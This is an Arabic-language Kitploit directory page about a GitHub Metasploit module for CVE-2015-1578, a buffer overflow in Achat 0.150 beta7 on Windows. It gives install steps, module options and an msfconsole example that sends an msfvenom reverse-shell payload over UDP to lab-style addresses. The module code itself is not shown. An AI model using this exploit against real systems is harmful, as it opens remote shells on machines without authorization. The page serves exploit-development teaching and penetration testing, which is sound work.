Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-1578-PoC-Metasploit — هذا هو استغلال وحدة Metasploit لإثبات المفهوم لثغرة CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على Windows. يؤدي الاستغلال إلى تنفيذ تعليمات برمجية عن بُعد عبر حزمة UDP مصمّمة خصيصًا. | Kitploit
أدوات/GitHubGitHub/yaldobaoth/cve-2015-1578-poc-metasploit
أطر اختبار الاختراقأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالشيل كودأداة الوصول عن بعدتوليد شيفرة القشرةتطوير الحمولاتاستغلال الملفات الثنائية
GitHubyaldobaoth/cve-2015-1578-poc-metasploit

CVE-2015-1578-PoC-Metasploit

هذا هو استغلال وحدة Metasploit لإثبات المفهوم لثغرة CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على Windows. يؤدي الاستغلال إلى تنفيذ تعليمات برمجية عن بُعد عبر حزمة UDP مصمّمة خصيصًا.

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

وحدة Metasploit لـ CVE-2015-1578

نظرة عامة

هذه وحدة Metasploit لـ CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على ويندوز. يؤدي استغلالها إلى تنفيذ كود عن بُعد عبر حزمة UDP مخصصة.

الغرض

صُممت هذه الوحدة لتكون مثالًا نظيفًا وبسيطًا ومنظمًا جيدًا لتطوير استغلالات Metasploit. توضح:

  • توليد شيلكود ديناميكي مشفر بـ Unicode عبر msfvenom
  • حقن الحمولة يدويًا (تجاوز مُرمّز الحمولة الداخلي في Metasploit)
  • آلية توصيل بسيطة تعتمد على UDP
  • التكامل مع Metasploit Framework باستخدام تحميل الوحدات المخصصة

فيديو تعليمي

فيديو تعليمي

التبعيات

  • Metasploit Framework
  • msfvenom في $PATH الخاص بك

الميزات

  • يستخدم msfvenom لتوليد حمولة بترميز x86/unicode_mixed وأحرف محظورة مخصصة
  • يتجنب نظام ترميز الحمولة المدمج في Metasploit للتغلب على قيود المُرمّز

التثبيت

root@kitploit:~
./install.sh

ثم شغّل Metasploit ونفّذ:

root@kitploit:~
reload_all
use exploit/windows/yaldobaoth/achat_bof

الخيارات

  • RHOSTS – عنوان IP للهدف (مطلوب)
  • LHOST – عنوان IP للمضيف المحلي للشل العكسي (مطلوب)
  • LPORT – المنفذ المحلي للشل العكسي (الافتراضي: 4444)
  • RPORT – منفذ UDP البعيد على الهدف (الافتراضي: 9256)

مثال استخدام

root@kitploit:~
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run

سيؤدي هذا إلى:

  • توليد حمولة شل عكسي متوافقة مع Unicode باستخدام msfvenom
  • حقنها في مخزن Achat الهش عبر UDP
  • الاستماع للشل على LHOST:LPORT المحدد
تنزيل الأداة